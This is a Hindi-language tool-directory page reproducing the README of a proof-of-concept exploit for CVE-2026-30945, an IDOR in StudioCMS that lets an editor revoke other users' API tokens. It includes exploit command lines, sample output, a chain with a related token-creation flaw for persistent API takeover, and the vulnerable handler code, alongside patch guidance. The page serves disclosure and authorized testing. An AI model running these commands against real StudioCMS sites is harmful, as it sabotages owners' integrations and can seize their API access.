Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/filipegaudard/cve-2026-30945-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाAPI सुरक्षा
GitHubfilipegaudard/cve-2026-30945-poc

CVE-2026-30945-PoC

CVE-2026-30945 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, StudioCMS में एक IDOR जो मनमाने API टोकन रद्दीकरण और सेवा से इनकार की अनुमति देता है। इसमें मैनुअल और स्वचालित परीक्षण मोड शामिल हैं।

रिपॉजिटरी देखें
96 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🗑️ CVE-2026-30945

StudioCMS IDOR — मनमाना API टोकन निरस्तीकरण जिससे सेवा अस्वीकार (Denial of Service) होती है

CVE CVSS CWE Type

NVD • Advisory • CWE-639


अवलोकन

StudioCMS ≤ 0.3.0 में DELETE /studiocms_api/dashboard/api-tokens एंडपॉइंट किसी भी प्रमाणित उपयोगकर्ता को editor या उससे ऊपर के विशेषाधिकारों के साथ किसी अन्य उपयोगकर्ता के API टोकन निरस्त करने की अनुमति देता है, जिसमें admin और खाते शामिल हैं।

owner

हैंडलर tokenID और userID को सीधे अनुरोध पेलोड से स्वीकार करता है, बिना टोकन स्वामित्व, कॉलर पहचान, या भूमिका पदानुक्रम की पुष्टि किए। यह महत्वपूर्ण एकीकरणों और स्वचालनों के विरुद्ध लक्षित सेवा अस्वीकार को सक्षम बनाता है।

संबंधित: यह भेद्यता CVE-2026-30944 (टोकन निर्माण IDOR) के समान मूल कारण साझा करती है। जब इन्हें एक साथ जोड़ा जाता है, तो एक हमलावर वैध टोकन निरस्त कर सकता है और नए टोकन उत्पन्न कर सकता है, जिससे पूर्ण API क्रेडेंशियल अधिग्रहण हो सकता है।

हमले का प्रवाह

root@kitploit:~
┌──────────────┐   DELETE /api-tokens        ┌──────────────┐
│              │  {"tokenID":"<id>",          │              │
│   Attacker   │   "userID":"<owner-id>"}     │  StudioCMS   │
│   (Editor)   │ ──────────────────────────► │   Server     │
│              │                              │              │
│              │ ◄────────────────────────── │              │
└──────────────┘  {"message":"Token deleted"} └──────────────┘
                                                     │
                                                     ▼
                                              ┌──────────────┐
                                              │  Owner's     │
                                              │  CI/CD       │
                                              │  Pipeline    │──► ❌ 401 Unauthorized
                                              │  Integration │──► ❌ API Access Lost
                                              │  Monitoring  │──► ❌ Silent Failure
                                              └──────────────┘

भेद्यता विवरण

फ़ील्डमान
CVECVE-2026-30945
GHSAGHSA-8rgj-vrfr-6hqr
CVSS v3.17.1 (उच्च) — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H
CWECWE-639: उपयोगकर्ता-नियंत्रित कुंजी के माध्यम से प्राधिकरण बाईपास
CWE (द्वितीयक)CWE-863: गलत प्राधिकरण
MITRE ATT&CKT1531 — खाता पहुंच निष्कासन
OWASP APIAPI1:2023 — टूटा हुआ ऑब्जेक्ट-स्तरीय प्राधिकरण
प्रभावितstudiocms ≤ 0.3.0
समाधानstudiocms 0.4.0

सामग्री

फ़ाइलविवरण
cve_2026_30945_poc.pyमैनुअल और स्वचालित मोड के साथ Python शोषण स्क्रिप्ट
README.mdयह फ़ाइल
LICENSEMIT लाइसेंस

पूर्वापेक्षाएँ

  • StudioCMS ≤ 0.3.0 (कमजोर संस्करण)
  • Python 3.8+
  • कम से कम एक Editor खाते के लिए मान्य क्रेडेंशियल
  • एक ज्ञात टोकन रिकॉर्ड UUID (आंतरिक ID, JWT नहीं)
root@kitploit:~
pip install requests colorama

त्वरित प्रारंभ

मैनुअल शोषण

root@kitploit:~
# मालिक से संबंधित एक विशिष्ट टोकन निरस्त करें
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc

# CVE-2026-30944 के साथ श्रृंखला: पहले लक्ष्य के लिए टोकन बनाएं
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1

# परिणाम JSON में सहेजें
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc \
  --save

स्वचालित परीक्षण

root@kitploit:~
# कई भूमिकाओं के साथ परीक्षण करें
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --editor-user editor01 \
  --editor-pass editorpass \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc

तर्क

अनिवार्य

तर्कविवरण
-u, --urlलक्ष्य StudioCMS आधार URL
--target-uuidलक्ष्य उपयोगकर्ता UUID जिसका टोकन निरस्त किया जाएगा

वैकल्पिक

तर्कविवरण
--token-idनिरस्त करने के लिए आंतरिक टोकन रिकॉर्ड UUID (JWT नहीं)। यदि छोड़ा गया है, तो स्क्रिप्ट पहले CVE-2026-30944 के माध्यम से टोकन बनाने का प्रयास करेगी

मैनुअल मोड

तर्कविवरण
--usernameप्रमाणीकरण के लिए उपयोगकर्ता नाम
--passwordप्रमाणीकरण के लिए पासवर्ड

स्वचालित परीक्षण मोड

तर्कविवरण
--auto-testस्वचालित बहु-भूमिका परीक्षण सक्षम करें
--editor-userEditor खाता उपयोगकर्ता नाम
--editor-passEditor खाता पासवर्ड
--visitor-userVisitor खाता उपयोगकर्ता नाम
--visitor-passVisitor खाता पासवर्ड

फ़्लैग

तर्कविवरण
--saveपरिणाम JSON फ़ाइल में सहेजें
--no-ssl-verifySSL प्रमाणपत्र सत्यापन अक्षम करें

उदाहरण आउटपुट

कमजोर सिस्टम

root@kitploit:~
  ──────────────────────────────────────────────────────────
  PHASE 1: Authentication
  ──────────────────────────────────────────────────────────
  [+] 'editor01' के रूप में प्रमाणित
  [*] सत्र उपयोगकर्ता: editor01 (editor)
  [*] सत्र UUID: 39b3e7d3-5eb0-48e1-abdc-ce95a57b212c

  ──────────────────────────────────────────────────────────
  PHASE 3: Token Revocation (IDOR)
  ──────────────────────────────────────────────────────────
  [*] लक्ष्य UUID: 2450bf33-0135-4142-80be-9854f9a5e9f1
  [*] टोकन ID:    16a2e549-513b-40ac-8ca3-858af6118afc
  [*] लक्ष्य का API टोकन निरस्त किया जा रहा है...
  [+] टोकन निरस्त! सर्वर प्रतिक्रिया: Token deleted
  [!] भेद्यता की पुष्टि — टोकन सफलतापूर्वक निरस्त!
  [!] लक्ष्य उपयोगकर्ता के API एकीकरण अब टूट गए हैं (DoS)

पैच किया गया सिस्टम

root@kitploit:~
  ──────────────────────────────────────────────────────────
  PHASE 3: Token Revocation (IDOR)
  ──────────────────────────────────────────────────────────
  [*] लक्ष्य UUID: 2450bf33-0135-4142-80be-9854f9a5e9f1
  [*] टोकन ID:    16a2e549-513b-40ac-8ca3-858af6118afc
  [*] लक्ष्य का API टोकन निरस्त किया जा रहा है...
  [*] पहुंच अस्वीकृत (403 Forbidden) — एंडपॉइंट पैच किया जा सकता है
  [-] निरस्तीकरण विफल: पहुंच अस्वीकृत (403 Forbidden)

हमले की श्रृंखला (CVE-2026-30944 + CVE-2026-30945)

जब टोकन निर्माण IDOR (CVE-2026-30944) के साथ संयुक्त किया जाता है, तो एक हमलावर पूर्ण API क्रेडेंशियल अधिग्रहण कर सकता है:

root@kitploit:~
चरण 1: मालिक का वैध टोकन निरस्त करें    (CVE-2026-30945)
   └──► मालिक के CI/CD पाइपलाइन चुपचाप टूट जाते हैं

चरण 2: मालिक के लिए नया टोकन उत्पन्न करें       (CVE-2026-30944)
   └──► हमलावर के पास अब मालिक-स्तरीय API पहुंच है

चरण 3: मालिक समाधान के लिए नया टोकन बनाता है
   └──► हमलावर इसे फिर से निरस्त करता है (लगातार DoS)

यह एक ऐसा परिदृश्य बनाता है जहां हमलावर मालिक की API पहुंच पर लगातार नियंत्रण बनाए रखता है, मालिक द्वारा बनाए गए किसी भी नए टोकन को बार-बार निरस्त करता है जबकि अपनी अवैध पहुंच बनाए रखता है।


मूल कारण

packages/studiocms/frontend/pages/studiocms_api/dashboard/api-tokens.ts (पंक्तियाँ 58–99) पर कमजोर हैंडलर अनुरोध निकाय से tokenID और userID स्वीकार करता है और उन्हें बिना किसी प्राधिकरण जांच के सीधे विलोपन फ़ंक्शन में भेजता है:

root@kitploit:~
// [1] केवल जांचता है कि कॉलर editor है — नहीं कि वे किसके लिए टोकन हटा रहे हैं
const isAuthorized = ctx.locals.StudioCMS.security?.userPermissionLevel.isEditor;

// [2] दोनों मान अनुरोध निकाय से — सत्र के विरुद्ध कोई सत्यापन नहीं
const jsonData = yield* readAPIContextJson<{
    tokenID: string;    // कोई स्वामित्व जांच नहीं
    userID: string;     // कोई पहचान जांच नहीं
}>(ctx);

// [3] सीधे विनाशकारी ऑपरेशन में भेजा गया — IDOR
yield* sdk.REST_API.tokens.delete({ tokenId: jsonData.tokenID, userId: jsonData.userID });

हैंडलर में पांच अलग-अलग दोष हैं: अपर्याप्त अनुमति द्वार, कोई टोकन स्वामित्व सत्यापन नहीं, लापता कॉलर पहचान जांच, कोई भूमिका पदानुक्रम प्रवर्तन नहीं, और उपयोगकर्ता-नियंत्रित मानों का विनाशकारी ऑपरेशन में सीधा पास-थ्रू।


प्रभाव

  • सेवा अस्वीकार — CI/CD पाइपलाइनों, तृतीय-पक्ष एकीकरणों, या निगरानी प्रणालियों में उपयोग किए जाने वाले API टोकन चुपचाप निरस्त किए जा सकते हैं
  • चयनात्मक तोड़फोड़ — एक editor विशिष्ट admins या owners से टोकन सर्जिकल रूप से निरस्त कर सकता है
  • कोई ऑडिट ट्रेल नहीं — निरस्तीकरण को वैध ऑपरेशन के रूप में संसाधित किया जाता है, जिससे जिम्मेदारी निर्धारण कठिन हो जाता है
  • श्रृंखलाबद्ध होने पर लगातार DoS — CVE-2026-30944 के साथ संयुक्त, हमलावर पीड़ित द्वारा बनाए गए किसी भी नए टोकन को बार-बार निरस्त कर सकता है

शमन

StudioCMS को संस्करण 0.4.0 या बाद में अपडेट करें:

root@kitploit:~
npm install studiocms@latest

कानूनी अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

  • केवल उन प्रणालियों के विरुद्ध उपयोग करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • कंप्यूटर प्रणालियों तक अनधिकृत पहुंच अधिकांश न्यायक्षेत्रों में अवैध है
  • लेखक इस उपकरण के दुरुपयोग के लिए कोई दायित्व नहीं मानता है
  • हमेशा जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें

संदर्भ

  • CVE: CVE-2026-30945
  • Advisory: GHSA-8rgj-vrfr-6hqr
  • संबंधित CVE: CVE-2026-30944 (टोकन निर्माण IDOR)
  • CWE: CWE-639 — उपयोगकर्ता-नियंत्रित कुंजी के माध्यम से प्राधिकरण बाईपास
  • OWASP: API1:2023 — टूटा हुआ ऑब्जेक्ट-स्तरीय प्राधिकरण
  • MITRE ATT&CK: T1531 — खाता पहुंच निष्कासन

लेखक

Filipe Gaudard


लाइसेंस

यह PoC शैक्षिक उद्देश्यों के लिए MIT लाइसेंस के तहत जारी किया गया है। जिम्मेदारी और नैतिकता से उपयोग करें।

टूल डाउनलोड करें